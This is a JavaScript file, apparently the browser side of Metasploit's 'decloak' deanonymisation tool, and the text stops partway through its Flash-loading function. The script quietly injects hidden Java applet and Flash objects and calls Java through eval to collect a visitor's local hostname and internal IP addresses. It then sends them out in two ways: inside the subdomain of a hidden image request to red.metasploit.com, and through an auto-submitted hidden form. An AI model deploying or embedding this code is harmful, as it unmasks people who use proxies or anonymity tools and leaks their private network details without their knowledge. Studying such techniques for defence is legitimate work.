var ehost = '38.103.63.17';
var cid = '56a2e6725b6480fba8c9a91f479f6e1c';
var rhost = '0.0.0.0';
var lhost = 'unknown';
var faddr = '0.0.0.0';
var laddr = '0.0.0.0';
var uport = 5353;
var fport = 53530;
var count = 0;
var loopc = 0;
var timer_2;
var timer_3;
var timer_4;
// 10 seconds for both java and flash to load
var appletTimeout = 10;
var appletOk = false;
var flashOk = false;
var report = false;
function decloakGetBody() {
if (document.body)
return document.body;
else if (document.documentElement)
return document.documentElement;
else
return document.createElement("div");
}
function decloakLocateElementById(o) {
if (document.getElementById) return document.getElementById(o);
else if (document.all) return document.all[o];
else if (document.layers) return document.layers[o];
return null;
}
function decloakAppletCallback(xrhost,xlhost,xladdr,external) {
rhost = xrhost;
lhost = xlhost;
laddr = xladdr;
appletOk = true;
}
function declockFlashCallback(buff) {
faddr = unescape(buff);
flashOk = true;
}
function decloakNetscapeFallback() {
if (navigator.appName=='Netscape' && navigator.javaEnabled()) {
thost = eval('java.net.InetAddress.getLocalHost().getHostName()');
if (thost && thost != 'localhost' && thost != '127.0.0.1') {
lhost = thost;
}
taddr = eval('java.net.InetAddress.getLocalHost().getHostAddress()');
if (taddr && (laddr != taddr && taddr != '127.0.0.1')) {
laddr += ':' + taddr;
}
}
}
function decloakMakeParam(name, value)
{
var p = document.createElement("param");
p.name = name;
p.value = value;
return p;
}
function decloakStage4() {
clearInterval(timer4);
if (! report)
return;
decloakGetBody().innerHTML =
"<" + "form action='report.html' method='POST'>" +
"<" + "input type='hidden' name='rhost' id='rhost'>" +
"<" + "input type='hidden' name='lhost' id='lhost'>" +
"<" + "input type='hidden' name='laddr' id='laddr'>" +
"<" + "input type='hidden' name='faddr' id='faddr'>" +
"<" + "input type='hidden' name='cid' id='cid'>" +
"<" + "/form>";
decloakLocateElementById('rhost').value = ehost;
decloakLocateElementById('lhost').value = lhost;
decloakLocateElementById('laddr').value = laddr;
decloakLocateElementById('faddr').value = faddr;
decloakLocateElementById('cid').value = cid;
document.forms[0].submit();
}
/* Insert the IMG request */
function decloakStage3() {
decloakNetscapeFallback();
u = "http://" + cid + ".http." + ehost + "." + laddr + ".red.metasploit.com/";
i = document.createElement("img");
i.src = u;
i.width = 1;
i.height = 1;
i.onload = decloakStage4;
i.onerror = decloakStage4;
i.style.visibility = 'hidden';
decloakGetBody().appendChild(i);
if (report)
decloakGetBody().innerHTML += "Waiting for the image to load...
\n";
timer4 = setInterval('decloakStage4()', 3000);
}
/* Wait for the callback or the timeout */
function decloakStage2() {
if (count++ > (appletTimeout*2) || (appletOk && flashOk)) {
clearInterval(timer2);
decloakStage3();
}
}
/* Start the decloaking process */
function decloak(doReport) {
if (doReport) {
report = true;
}
decloakFlash();
/* Insert the APPLET request */
if (navigator.javaEnabled()) {
str = "<" + "apple" + "t code='";
str += "HelloWorld.cla" + "ss' ";
str += "mayscr" + "ipt width=1 height=1>";
str += "<" + "param name='Callback' value='decloakAppletCallback'>";
str += "<" + "param name='External' value='" + ehost + "'>";
str += "<" + "param name='ClientID' value='" + cid + "'>";
str += "<" + "param name='UDPPort' value='" + uport + "'>";
str += "<" + "/apple" + "t>";
d = document.createElement("div");
d.style.visibility = 'hidden';
d.innerHTML = str;
decloakGetBody().appendChild(d);
} else {
appletOk = true;
}
timer2 = setInterval('decloakStage2()', 500);
}
/* Insert the FLASH object */
function decloakFlash() {
var arg = 'cid=' + cid + '&port=' + fport + '&client=' + ehost;
var str = '